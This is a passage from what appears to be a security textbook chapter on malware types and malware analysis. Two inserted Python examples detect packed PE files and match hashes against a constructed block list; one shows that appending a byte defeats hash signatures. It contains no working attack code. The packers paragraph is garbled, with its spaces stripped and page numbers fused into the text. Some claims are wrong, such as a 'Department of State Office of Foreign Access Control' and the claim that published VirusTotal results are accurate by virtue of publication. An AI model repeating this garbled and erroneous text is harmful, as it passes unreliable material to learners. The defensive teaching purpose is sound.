In the same way, malware called a Trojan appears to be something benign, often something you believe you know. Instead, it infects your system. Because it expects a user to be involved, running a program they believe to be something other than the malware it actually is, a Trojan is just a particular type of virus. It infects your system and needs user involvement and is malware. That's a virus. You could consider it a type of social engineering, where users are tricked into executing the malware by making them believe it's something it isn't. It doesn't always have to be an executable, by the way. It is possible to receive a document that you believe to be, say, an invoice or a receipt. You open the file to see what it is and then you are infected. This is a common approach with social
engineering and email. If you happen to have a Junk or Spam folder, you may look and see email messages with attachments. Those attachments may very well be infected PDF files. Often, you may find that someone is sending you something they are claiming to be an invoice or some sort of tracking document. This is different from the case in which there is a URL that you have to visit. It would be an attachment or potentially just an HTML-based email message.

Botnet

A botnet can be part of the payload of a virus or a worm and could also be installed by a Trojan horse. When you hear the word botnet, it's really referring to a botnet client that is being installed. The botnet is the entire collection of endpoints that have been infected with a particular family of malware. The botnet client is a small piece of software whose purpose is to connect back to command-and-control infrastructure (C&C or C2). We'll get deeper into this infrastructure later in the section "Malware Infrastructure." The client takes its commands from the C&C infrastructure. The botnet could be used for any number of purposes, but primarily the purpose of a botnet is to generate income for its owner. The purpose of the clients is to facilitate that process.

One example is the ZeuS botnet. This was one of the first pieces of malware that had a package you could purchase and then use to create your own botnet client. ZeuS came with a builder that took in a configuration file and then created a malware executable that could be used to infect systems. You can see the builder in Figure 8.2. The objective of ZeuS and, as a result, the objective of the configuration is to steal banking information from infected systems. This allows the attacker to use the authentication credentials to steal money from those banks. You can configure ZeuS based on the specific banks you would like to target.

FIGURE 8.2 ZeuS Builder

Once ZeuS has been installed on a target system, it provides a way for the attacker to access the system remotely. ZeuS can capture keystrokes and extract bank account information to transmit to the attacker. Of course, theft is not the only thing a botnet client is capable of. Botnets are also used to send spam emails, host web servers that can shift from one system to another, or participate in distributed denial-of-service attacks. In cases where an attacker has millions of systems they have compromised, they are capable of sending hundreds of gigabits or possibly even terabits per second in attack traffic, enough to take a lot of businesses offline so their customers can't connect.

Ransomware

Ransomware is another type of malware. The goal of ransomware is to extort money from a victim. Ransomware is a program that encrypts a portion of a victim's hard drive, where personal files are stored. In some cases, it may be important business documents. The attacker provides instructions for the victim to send money, usually in a type of cryptocurrency like Bitcoin. The idea behind this is that the attacker will provide the decryption key once the ransom has been paid. With the decryption key, the victim can get their valuable data back. Typically, there is a time limit before the data is destroyed just to put a little extra heat on the victim.

One of the best-known families of ransomware is WannaCry. This is a piece of malware that affected hundreds of thousands of systems around the world, where people had not maintained the current patch level on their systems. Figure 8.3 shows the message you would have received had WannaCry infected your system. Fortunately, fast action on the part of Microsoft, along with malware researchers, was able to limit the overall number of devices impacted around the world. Even so, it's estimated to have cost millions to potentially billions of dollars.

FIGURE 8.3 WannaCry ransom demand

WannaCry was spread through the use of an exploit developed by the U.S. National Security Agency (NSA). The exploit was known as EternalBlue, and it was part of a cache of
information released by a group known as the Shadow Brokers, who had infiltrated the NSA to get information about tools and tactics used by NSA employees working on cybersecurity and cyberwarfare. It wasn't many months after the release of that information that WannaCry started spreading. While WannaCry is definitely ransomware, that refers only to what it does and doesn't really refer at all to how it spreads. So, is it a virus or a worm? Since it used a remote vulnerability to infect systems, it was capable of connecting to other systems automatically and infecting them. Since it was capable of moving on its own, that makes it a worm. This is an example of how a single piece of malware could be categorized in multiple buckets. WannaCry is a ransomware worm.

2020 was the year of ransomware. Attackers have discovered that it's far more efficient to just demand money from victims than trying to steal information and utilize it. Traditionally, threat groups have fallen into three categories. The first is intelligence driven. Sometimes, this group is referred to as nation-states. These are groups that are looking for information such as intellectual property from companies. This intellectual property is used to enhance the market capabilities of state-sponsored businesses. The second group is criminal organizations. These are groups that are only in it for the money. They are businesses with employees and working hours. These employees may have roles and responsibilities just like you would in a job you had. The final group is hacktivists. These are people who are just trying to make waves. They have a point to make and will do a lot of different things to make it. This may be defacing web pages or performing distributed denial-of-service attacks. Sometimes, nation-states will also engage in financially motivated crimes to obtain funding to support continued operations.

What's been happening more, especially starting in 2020, is these nation-states that were previously interested in intellectual property have been pivoting to ransomware attacks because they can be so lucrative. In spite of indications by the U.S. Department of State's Office of Foreign Access Control (OFAC) that they will fine companies that pay ransomware, companies are paying the ransom simply because it's more cost-effective than trying to restore, even in cases where the company has a robust backup infrastructure and process. Additionally, insurance companies may also make the decision to pay on behalf of the company because the insurance company finds it will cost them less to pay out a ransom than to pay for the costs of recovery if the company can recover in a more traditional way.

There are a lot of ransomware families in the wild today. One of them, Maze, started hitting companies in 2019 and picked up a lot of steam in early 2020. When Maze hits and encrypts files on systems, the malware leaves an image on the background of a victim computer's desktop providing details for payment. Other ransomware will leave a text document somewhere that will be found with the ransom demand. A common requirement is payment in Bitcoin, though other cryptocurrencies (digital currencies that are protected and made anonymous through cryptographic techniques) may be used.

Increasingly, ransomware operators are also stealing data, then holding it hostage. They threaten to release the data unless they get paid. Additionally, more and more, they are announcing the data theft as a way to shame companies in the hopes that the shame may be a motivation to pay. Companies may find it better to pay this ransom than be shamed and potentially lose customers because these customers have discovered their data was stolen
from the company. Additionally, some companies may have to pay regulatory or other fines. It may be cheaper and better for business to pay the ransom demand.

In some cases, ransomware may have publicly available decryptors. If you can find a decryptor, you may be able to use it to not pay the ransom. The problem with these decryptors is they may also contain malware, depending on where you may have found them. Not all sources of this software are reputable, perhaps unsurprisingly.

One thing that's known about modern ransomware is that the attackers may stage the ransomware for long periods of time before it's triggered to encrypt the data on systems. This was the case with healthcare organizations in 2020. Attackers were thought to have staged ransomware in healthcare organizations around the world. The Federal Bureau of Investigation (FBI) announced the expectation that healthcare organizations should be vigilant because of credible intelligence indicating that a ransomware operator had staged software in a number of hospitals and other healthcare-related businesses. This technique of staging before triggering, while devastating for businesses, is smart practice. In cases where ransomware is detected within an environment, it may be possible to contain the outbreak as it is spreading if it is encrypting as soon as a new system is infected. Instead, if you wait to encrypt until all possible systems have been infected, there is a greater chance the organization will have to pay.

Dropper

A dropper is a type of malware that doesn't commonly come alone. The dropper is used as a starting point. Once it is installed on your system, it starts grabbing other software to install. This may include backdoors, keyloggers, botnet clients, Trojans, or other software that is useful to the attacker. There may be many reasons for using a dropper rather than just simply including all the functionality the dropper then installs. It could be to keep the size of the initial infection to a minimum. It could also be that the dropper could avoid detection where the other software may be more easily detected. Once all of the software the attacker wants on the system is in place, the dropper can remove itself so it can't be located. This sort of multistage attack adds layers when it comes to not only detection but also analysis. A dropper could also include functionality to act as a Tor node so it could pull malware out of the Tor network. This could also help avoid detection, especially as Tor may not use common pathways that could be identified. On top of that, it would utilize encryption, which makes it much harder to detect if the security devices can't grab and proxy known Hypertext Transfer Protocol (HTTP) paths (ports).

Malware Analysis

Before we go anywhere with analysis, you should know we're going to be using a number of tools to do the analysis. Rather than grabbing all the tools and installing them individually, you may find it easier to make use of a package that will install them all for you. We won't be making use of Kali this time around. Instead, we're going to use Windows-based tools. There is some danger in this. The majority of malware is written for Windows systems because it is the predominant desktop and the one most likely to be used by people who may be susceptible to malware and social engineering attacks. Since you may be working on malware written for Windows systems, you have to be careful working with it. Any mistake and you'll find you are working on a compromised system.

To get the tools we need installed, you can take a look at a PowerShell script that was written by members of the FireEye Labs Advanced Reverse Engineering (FLARE) team. It is available at the FLARE team's GitHub site (https://github.com/fireeye/flare-vm). The install.ps1 script will install all the necessary tools automatically, making use of the Chocolatey package manager.

We're going to look at the two types of malware analysis. The first, static analysis, looks at the code to analyze it. We'll make use of tools that will show us the executable code without actually running the program. As noted earlier, running the program is the last thing we want to do. The second type of malware analysis is dynamic. With dynamic analysis, we actually run the malware and observe the behavior. As you might expect, this takes planning and preparation and, of course, a lot of care. There are techniques we can use to allow that to happen. Of course, it's important to not only run the malware but also monitor the system so we can determine what the malware is doing.

One way to perform this analysis is to have virtual environments. There are several reasons for this. One is the ability to snapshot the environment. This means you can
always revert back to a known, clean state, assuming you remember to take the snapshot. This is where some of the care comes from. You need to make sure you are taking snapshots at the right time and, ideally, keeping track of what each snapshot is. Some virtual machine (VM) software will allow you to label the snapshot. By default, it may just put a date and time stamp on the snapshot. The date and time stamp isn't very descriptive, so if that's all there is to identify the snapshot, you may simply not know what state it was in.

VM software is fairly easy to come by. There are several ways to set up a lab. You can do a lab on a single box using a hypervisor like VMware. This could allow you to have multiple virtual systems. It would also allow you to control the networking so the malware isn't able to phone home. There is a challenge to doing malware analysis in VMs, though. Some malware is capable of recognizing that it's running in a VM, and it may not exhibit any of its normal behaviors in that case. This is meant to make it appear to be benign and evade analysis. It is one of the reasons static analysis can be so important—because you aren't relying on the malware to expose itself in a monitored condition.

Static Analysis

Static analysis of malware is when we look at the details of the malware sample without running it. This can include the properties of the file as well as the actual code. That's where it takes a lot of practice and skill, though. When I say we are looking at the actual code, I mean we are looking at the disassembly of the program, reverting to assembly language rather than the binary opcodes (operation codes). Not surprisingly, then, in order to be good at that aspect of static analysis, you need to understand assembly language. Otherwise, you are just staring at a list of mnemonics that don't mean much to you, as well as a lot of hexadecimal values. The good thing about looking at the disassembly of the program file is that you are looking at the program. It's not like hiding the existence of the malware because the hash value changes and antivirus can't detect it. If you can read through the program from the disassembly, you will know what the program is doing.

We'll start simply, though. We're going to look at some of the properties of the file. Since it doesn't matter much at this point what we look at, because all programs will have these properties, we're going to look at a simple program I wrote in C. The values of the properties will be different from one program to another, and there are some properties we're going to spend some time looking at to determine if it may be malware and then what that malware may be up to. To do this, we're going to use a program called Cutter. As a start, we can take a look at an overview of the executable, as shown in Figure 8.4. We can tell from the overview what CPU architecture the executable is for—whether it's for 32-bit or 64-bit, for instance. Additionally, we can determine that the file format is a portable executable. The portable executable (PE) file format wraps the executable code along with information that the operating system loader needs to place the program in memory and start execution. PE files aren't only .exe files. They can also be dynamic link libraries (DLLs).

FIGURE 8.4 Overview of PE in Cutter

The goal of a PE file, as noted earlier, is to provide information for the loader to get all the elements of the program into memory. We can look at the different elements using Cutter. Figure 8.5 shows a list of the program sections from our sample program. When a program is compiled, it is broken into multiple sections, which are identified with labels so the operating system loader will know what to do with them. There are multiple sections that may be part of PE files, but we're going to focus on a couple of them specifically. The first
331sectionisthe.textsection,whichisalltheexecutablecode.Anothersectionisthe.datasection,whichcontainsallinitializeddataintheprogram.Thismeansit’sdatathatisknownaboutatcompiletime.Variablesthataredefinedwhentheprogramiscompiled,withvaluesassigned,arestoredinthe.datasection.Thereisalotofdatathatisonlyknownaboutandassignedatruntime.Thatisstoredsomewhereelse.FIGURE 8.5 PortableexecutablesectionsPackersand EncryptorsThereasonforbringingthesesectionsupspecificallyisthatyoucangetsomehintsastowhetheraprogramyouarelookingatismalwareornot.Thereareprogramsthatcandelivermalwarecalledpackers.Theseareprogramsthathaveasmallexecutablesection.Theobjectiveofthatsmallexecutable,sometimescalledastub,istotaketherealprogramandeitherunpackit,becauseit’scompressed,orsometimesdecryptit.Oncetheexecutablebitsaredecompressedordecrypted,anewthread,orforkedprocess,getsstartedupandcontrolgetshandedtothoseexecutablebits.Packersandencryptorsareusedtohelpgetbyantivirusprograms.Theonlythingthattheantivirusprogramseesisthestubprogram.Thecompressioncouldbeaschemetheantivirusdoesn’tknowhowtohandle,andthesamecouldbetrueoftheencryption.Additionally,withoutthekey,theantivirusprogramcan’tseeinsidethedataanyway.Antivirusprogramsoftenworkwithsignatures.Asimplechangetotheencryptionkeycouldalterthesignatureofanyexecutable,meaningitwillevadeantivirus.Changingparametersofthecompressionwillalsochangethesignature.Thismakesanalyzingthemalwareimportant.KeepinmindtheinformationfromFigure 8.4thatshowedthedifferentsectionsandtheirsizes.Typically,the.textsectionisgoingtobethelargest.ThisisthecasefromFigure 8.4.Inthecaseofanyprogramthatispackedorencrypted,thestubprogram,whichwouldbeinthe.textsection,wouldberelativelysmall,whilethe.datasectionwouldbelarge.While332 Chapter8  Malware■Cutterisaveryversatiletoolforanalyzingexecutables,itdoesnotidentifypackedexecutables.Forthat,wecanturntoanotherprogram,suchasPEDetective.OneadvantageofPEDetectiveisthatwecanscanentiredirectoriestoidentifytheprograms.InFigure 
8.6,youcanseetheoutputofacollectionofmalwarefromadirectory.You’llseethatthereareafewthathavebeenpackedwithdifferentpackers.OnecommonpackerisUPX,whichyoucanseewasusedhere.FIGURE 8.6 LookingforpackersYouwillalsonoticethatPEDetectivecandeterminethecompilerthatwasusedfortheprogram,whichmaybeofsomeinterest.Interestingly,openingtheseprogramsbackinCutter,thereareacoupleofpropertiesoftheexecutableworthtakingalookat.Thefirstisthat,unlikethepreviousprogramwelookedat,wherewecouldseethedifferentsectionsintheprogramandthegraphshowingtheirrelativesizes,therearenosectionsintheexecutablethat’spackedwithUPX.Wecangetanideaofwhatishappening,though,bylookingatanothersetofdetails.Thelackofatleasta.textsectionissuspicious,butwhenwelookattheentrypoint,thememoryaddressatwhichtheoperatingsystemistoldtostartexecution,wecanseesomethinginterestinginFigure 8.7.AtthetopofFigure 8.7,thereisafunctionidentifier.Thisisalabelthatpointstoaplaceinmemory.YoucanseethattheidentifierisUPX1:entry0.ThistellsustheprogramwaspackedwithUPX1andentry0isthelabelforthedecompressionstubcode.Thelabelentry0indicatestheentrypointfortheprogram.Ofcourse,youmayendupwithMalwareAnalysis 333compressedexecutableswithoutclearindicatorslikethis.UPXis,though,oneofthemostpopularandcommonlyusedprogramstocompressexecutables.FIGURE 8.7 
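The section-layout hints just described (a stub that is tiny or missing, a large opaque data blob, UPX-style section names) can be checked without a GUI. The following is an added example and is not code from the book, from Cutter, or from PE Detective: a minimal PE section-table parser in Python that reports each section's on-disk size, memory size, permissions and byte entropy, and a set of heuristics that turn those numbers into the indicators the text describes. The two PE images it inspects are constructed inline by the build_pe helper (valid headers and a section table, but not runnable programs); with a real sample you would pass open(path, "rb").read() to parse_sections instead. Entropy near 8 bits per byte is the practical signal for compressed or encrypted content, since native code is normally well below that.

```python
import math
import random
import struct

# IMAGE_SCN_* section characteristics from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data):
    """Bits of entropy per byte: ~8.0 means compressed/encrypted, native code is usually lower."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe):
    """Walk DOS header -> PE signature -> COFF header -> section table; one dict per section."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _machine, nsections, _ts, _symptr, _nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size
    sections = []
    for i in range(nsections):
        (name, vsize, _vaddr, rawsize, rawptr, _relocs, _lines,
         _nrelocs, _nlines, chars) = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        raw = pe[rawptr:rawptr + rawsize] if rawsize else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize,
            "raw_size": rawsize,
            "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE),
            "writable": bool(chars & IMAGE_SCN_MEM_WRITE),
            "entropy": round(shannon_entropy(raw), 2),
        })
    return sections


def packing_indicators(sections):
    """Heuristics for the packer layout described in the text; returns human-readable findings."""
    findings = []
    names = [s["name"] for s in sections]
    if any(n.upper().startswith("UPX") for n in names):
        findings.append("UPX-named sections present")
    if ".text" not in names:
        findings.append("no .text section")
    for s in sections:
        # Executable section with no bytes on disk but a large in-memory reservation: unpack target.
        if s["executable"] and s["raw_size"] == 0 and s["virtual_size"] > 0:
            findings.append("%s: executable, 0 bytes on disk, 0x%x reserved in memory" % (s["name"], s["virtual_size"]))
        # Writable + executable + near-random bytes: compressed or encrypted code waiting for a stub.
        if s["executable"] and s["writable"] and s["entropy"] > 7.0:
            findings.append("%s: writable+executable with entropy %.2f" % (s["name"], s["entropy"]))
    return findings


def build_pe(sections):
    """Assemble a minimal 32-bit PE image from (name, virtual_size, raw_bytes, characteristics) tuples.
    Constructed for this example only: the optional header is zeroed and the image is not runnable."""
    opt_size = 224                                     # size of a PE32 optional header
    n = len(sections)
    headers_end = 0x40 + 4 + 20 + opt_size + 40 * n
    raw_start = (headers_end + 0x1FF) & ~0x1FF         # file alignment 0x200
    img = bytearray(0x40)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)            # e_lfanew -> PE signature right after the DOS header
    img += b"PE\0\0"
    img += struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, opt_size, 0x0102)  # i386, executable image
    img += bytes(opt_size)
    blobs, ptr = b"", raw_start
    for i, (name, vsize, raw, chars) in enumerate(sections):
        img += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, 0x1000 * (i + 1),
                           len(raw), ptr if raw else 0, 0, 0, 0, 0, chars)
        blobs += raw
        ptr += len(raw)
    img += bytes(raw_start - len(img))
    return bytes(img) + blobs


_rng = random.Random(2021)
# Ordinary layout: low-entropy code in .text, small initialized .data.
NORMAL_PE = build_pe([
    (b".text", 0x400, bytes(range(16)) * 64, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".data", 0x100, b"AB" * 128, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])
# UPX-style layout: empty UPX0 reserved for the unpacked program, high-entropy UPX1 holding stub + packed bytes.
PACKED_PE = build_pe([
    (b"UPX0", 0x10000, b"", IMAGE_SCN_CNT_UNINITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (b"UPX1", 0x1000, bytes(_rng.getrandbits(8) for _ in range(4096)), IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (b".rsrc", 0x100, b"\0" * 256, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
])

if __name__ == "__main__":
    for label, image in (("normal", NORMAL_PE), ("packed", PACKED_PE)):
        for s in parse_sections(image):
            print(label, s)
        print(label, "indicators:", packing_indicators(parse_sections(image)))
```

The heuristics are deliberately layout-based rather than signature-based, which is why they still fire on a packer whose stub bytes you have never seen; the price is that legitimately compressed resources or embedded certificates can raise the entropy flag, so treat the findings as a reason to look closer, not as a verdict.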
Disassembly

The most effective way to see what a program is going to do, short of running it, is to look at the code. We can't look at the source code, but we can disassemble the executable. The process of disassembly is taking the executable code, stored as the operations codes (opcodes) that the CPU understands, and converting them back to something that's more understandable for humans—assembly language. Of course, assembly language isn't the most readable language. At best, you get something that's more understandable than just numbers. Disassembly converts operation codes to mnemonics. A mnemonic is a memory assist technique. Often you will see a phrase where the initial letter of each word in the phrase maps to something you need to remember. That's one type of mnemonic. In our case, we get three or four letters to indicate what each opcode does. In Figure 8.8, you can see a section of a program that has been disassembled. There are a lot of programs that can perform a disassembly. We are looking at the disassembly in Cutter. This is just a read-only view of the program. Cutter doesn't give us the ability to execute the program or alter it in any way. There are other programs that can perform a disassembly and also give us a way to control the run of the program. Since we are performing a static analysis, we don't actually want to run it, so what we are getting from Cutter is perfect.

FIGURE 8.8 Program disassembly in Cutter

This is where it gets hard, though. To understand what is happening, we need to be able to read assembly language, which is something that takes some practice. Where high-level programming languages give us variables to work with, assembly language gives us memory to work with. Any data that an opcode needs to act on, called an operand, is stored in a type of memory called a register. This is a fixed-length memory location that's stored on the CPU, making access to it very fast. We need to be able to get data into the registers, though, which means we need something like the mov operation. As you might expect, this moves information from one place to another. In the second line of code from Figure 8.8, you can see a mov where data is moved out of a memory location and into a register. Some registers have specific functions. For example, the mov operation on the second line of code, mov esi, 0x405000, uses a register referred to as esi. This is a general-purpose register that is often used to store memory addresses. Specifically, it stores a source address. The edi register stores destination addresses. The third line of code shows an operation lea, which is shorthand for load effective address. This allows the edi register to contain the result of a computation, which is shown in square brackets. The reference to esi in that line returns the contents of that register, which is a memory address. The hexadecimal value 0x4000 is subtracted from that memory address and the result is loaded into the edi register. The value in this register is pushed onto the stack. One reason for pushing values onto the stack is to prepare for a function call. This is commonly done using the call mnemonic, though you could do it with some version of a jump. The jump is used to pass execution to a different memory location. There are multiple versions of jump. Some of them are meant to follow a compare (cmp) and are used to jump if a register value is nonzero, for instance. As you look through the disassembly, you will also see a lot of arithmetic operations, including add and sub (for subtract). You will also see inc, which is the mnemonic for increment, meaning we are adding one. The difference is that you don't have to take multiple steps to retrieve a value, add one to it, store the result, and then move it back to the register it came out of. Performing a static analysis by following the code is time-consuming if you don't want to run the program. Running the program when you have a potential malware sample is dangerous. You could be causing damage to files on your system, or you could be infecting other systems on your network. Using a static analysis in this way, as indicated earlier, is time-consuming and requires a solid understanding of the behavior of different operations codes.

Properties

In addition to looking inside the program file, we can just take a look at some of the metadata associated with it. This can include the compile date and time, for instance. Some of the data is not only specific to the executable but generic across all files. Getting the file properties can show you the created, accessed, and modified dates and times. It's possible this can give you some information about the malware and certainly about what has happened on your system. When you bring up properties on an executable file, you get a tab named Details. With an executable, you get information like product name and copyright. You can see this in Figure 8.9.

FIGURE 8.9 Properties on executable

In this case, there isn't any information because nothing was specified for the compiler to put into the file. If you were to look at any of the system files, as examples, you would see Microsoft Corporation as the copyright holder. You would also get information about what the program is, potentially. This is not to say that malware authors are going to put their names in. In fact, you may find bogus information here. One thing software vendors can do, though, is to sign the executable. This means adding a cryptographic signature. Large vendors, especially Microsoft, will sign the executable. Even if a malware author inserts information into the metadata suggesting the file is from Microsoft, the executable will not have the right cryptographic signature. You should be able to see that the signature wasn't made with a legitimate Microsoft certificate.

VirusTotal

Another way to perform a static analysis without executing the program is to obtain a hash of the sample. There are different hash algorithms that can be used. A common one is Message Digest 5 (MD5). This is a hash algorithm that has been around for decades. It's well known, and while there are some applications for which it isn't the best approach because it can be prone to collisions (instances where two different data sets generate the same value), obtaining a file hash for analysis of malware is not generally considered to be one of them. In the following listing, you can see a run of a hashing algorithm on a Windows system to get an MD5 sum.

Getting an MD5 Hash

C:\Users\kilroy\Documents> md5sum.exe bogus.exe
846693bf0c4c678e9727cfade75ebce3 *bogus.exe

C:\Users\kilroy\Documents>

You can, of course, use additional hashing algorithms like the Secure Hash Algorithm (SHA). SHA-1 generates a longer hash than MD5 does, which means the space that hashes can be generated in is much larger. SHA-1 is slowly being replaced by SHA-256, which is considerably larger than SHA-1. The chance of collisions is significantly smaller than in SHA-1 and certainly smaller than in MD5. Once you have a hash value, you can use it to check databases of malware, which commonly store hash values to compare against. Antivirus programs generally match hash values to known malware. There is a website you can go to that will compare malware against multiple antivirus programs. VirusTotal currently checks against 60 antivirus programs. If you have a file, you can upload it, and VirusTotal will check the file by obtaining a hash and comparing the hash against the dozens of antivirus programs. Figure 8.10 shows the result of testing a PDF that was in my Junk Mail folder. This appears to be a phishing attempt.

FIGURE 8.10 VirusTotal results

Figure 8.10 shows how the different anti-malware programs identify the sample. Out of 60 antivirus programs, 9 of them identify this sample as malware. All of the others identify it as clean. This just tells us what the antivirus programs think. It doesn't give us any details. If we go to the Details tab, we will get the hash values from the different cryptographic algorithms. Figure 8.11 shows additional properties on the file, including multiple hashes, the file type, and the first time this file was submitted to VirusTotal. This is apparently a reasonably recent sample, as it was first submitted just a couple of weeks before this submission.

FIGURE 8.11 VirusTotal details
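The hashing step from the Getting an MD5 Hash listing, and the lookup against a hash database that follows it, as an added example in Python (not code from the book or from VirusTotal): it digests a sample with MD5, SHA-1 and SHA-256 in one pass, parses the digest *name form that md5sum and sha256sum print, matches the digests against a block list, and then shows the limitation the packer discussion raised earlier: one appended byte changes every digest, so a hash-only signature no longer matches. The sample bytes and the block list are constructed for this example and are not real malware or real indicators.

```python
import hashlib
import re

# md5sum/sha256sum output: 'digest *name' (binary mode) or 'digest  name' (text mode).
MD5SUM_LINE = re.compile(r"^(?P<digest>[0-9a-fA-F]{32,128})\s+(?P<mode>[ *])(?P<name>.+)$")


def hash_sample(data):
    """Digest the sample with the three algorithms malware databases commonly key on."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def parse_md5sum_line(line):
    """Return (digest, filename, binary_mode) for one line of *sum output."""
    m = MD5SUM_LINE.match(line.strip())
    if not m:
        raise ValueError("not a *sum output line: %r" % line)
    return m["digest"].lower(), m["name"], m["mode"] == "*"


def match_blocklist(hashes, blocklist):
    """Return (algorithm, label) for every digest of the sample that appears in the block list.
    Feeds differ in which algorithm they publish, so all three are looked up."""
    return [(alg, blocklist[d]) for alg, d in hashes.items() if d in blocklist]


# Constructed stand-ins: a fake "executable" and a two-entry block list keyed by its digests.
SAMPLE = b"MZ\x90\x00 constructed stand-in for a malicious executable"
BLOCKLIST = {
    hash_sample(SAMPLE)["sha256"]: "Constructed.Demo.A (sha256 feed)",
    hash_sample(SAMPLE)["md5"]: "Constructed.Demo.A (legacy md5 feed)",
}


def demonstrate_evasion():
    """Matches before and after appending a single byte, which is all a re-pack or a new
    encryption key amounts to from a hash database's point of view."""
    before = match_blocklist(hash_sample(SAMPLE), BLOCKLIST)
    after = match_blocklist(hash_sample(SAMPLE + b"\x00"), BLOCKLIST)
    return before, after


if __name__ == "__main__":
    print(parse_md5sum_line("846693bf0c4c678e9727cfade75ebce3 *bogus.exe"))
    print(hash_sample(SAMPLE))
    print(demonstrate_evasion())
```

Because MD5 collisions can be manufactured, two different files can be built to share an MD5 digest; SHA-256 is the value to record and exchange, with MD5 and SHA-1 kept only for matching older feeds.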
In addition to that data, the Details tab contains details about commonly abused properties of PDF files and the number of instances that show up in the sample provided. It also provides details of the Exif File metadata. With VirusTotal, you can make use of the analysis done by others, which can help save you a lot of work. However, it does mean that you won't have the fun of doing the analysis yourself. Because it's published, though, it means that it is accurate, since it would have been vetted by others.

Using Ghidra

Ghidra is a tool developed by the National Security Agency (NSA) and released for public use. This is a tool that can be used for static analysis by providing extensive details about the executable under investigation. In some senses, it's much like a debugger along the lines of IDA Pro, a common debugger used by reverse engineering professionals. The problem with IDA Pro, if you can call it that, is that it's commercial software. Ghidra has many of the same features that make IDA Pro attractive, including scripting to make analysis easier, without the cost. It's also cross-platform since it's primarily written in Java. As long as you can get a Java Development Kit (JDK) installed on your system, you should be able to run Ghidra. You can manage multiple executables within a single Ghidra project. When you open an executable in Ghidra, you will be presented with a number of options for analysis. This analysis will be automated with all of the intelligence embedded into Ghidra. You can see some of the options available in Figure 8.12.

FIGURE 8.12 Ghidra analysis

Once you open Ghidra, it will provide you with much the same information you would get from a debugger. This includes a disassembly of the executable code. You can also get a list of functions in the executable, as well as any libraries that are imported or exported. Function names and libraries may provide some insight into what the program is doing. Programmers will often name functions in a way that the name indicates what the function does. This makes code more readable, meaning you can fix any problems later. Additionally, someone else can more easily fix problems later. Figure 8.13 shows the details from an executable file.

FIGURE 8.13 Executable file details

One really nice feature of Ghidra is the graphing ability. You can generate a graph of the functions in a program. This will provide you the pathways through the program. Functions that call other functions are connected, and those connections can be shown in a graph. This can help you see how a program may operate because you can see the functions and how they are called or how execution moves from one function to another. This practice is reverse engineering, and it takes a lot of understanding about how programs are constructed. You need to be able to read assembly language as well as understanding how different operating systems expect executables to be constructed. Each operating system has something called an application binary interface, which is how the executable needs to interact with the operating system. An executable is a container, including a lot of metadata about the program as well as the source code. In addition, you will get the segments that store data written into the program by way of the source code. Ghidra can help you decode the executable if you have a little knowledge and diligence. Over time you will get the expertise necessary to make this whole process easier.

Executable Assessment

Get a copy of Ghidra from ghidra-sre.org. Using Ghidra, open any executable (program) and generate a graph of the program. Identify pathways through the program.

Dynamic Analysis

Whereas the point of static analysis is to not run the program, a dynamic analysis is done by running the program to see what it does. There are multiple ways to do this without impacting your own system by infecting it with malware. This is where the challenge comes from, of course, when it comes to dynamic analysis. You want to be able to see what the behavior is without actually infecting a system you care about. You also don't want to put it into a sandbox that still has network access and is able to infect other systems on a network you care about. However, you need to have the malware believe it is on a running system and not in a sandbox. Malware has multiple ways to determine whether it is running from within a VM. First, it can check for any drivers provided by VMware, since VMware is a common hypervisor. It will also check the location of some memory data structures. It can also check the MAC address to determine if the vendor ID (the first three bytes) matches a VM provider. Malware that determines it is running inside a VM may opt to not deploy the payload, making it inert, which means you won't get to see what it does. The first approach is just to run the malware inside a VM. This has the advantage of being able to control the machine completely, including setting up controls on the network interface to prevent it from getting anywhere you don't want it to go. Also, with a VM, you can take advantage of snapshots to restore the system to a known clean state. This means you can run the malware over and over against clean systems to continue to observe the behavior. It also gives you the ability to compare snapshots, so you can see the differences between a clean system and one after running the malware. And you can perform analysis on the memory of a suspended VM.

Sandbox

A sandbox is a place that is safe for playing. This, in the case of malware analysis, is a place where you can look at the malware without fear of impacting other systems.

Cuckoo Sandbox

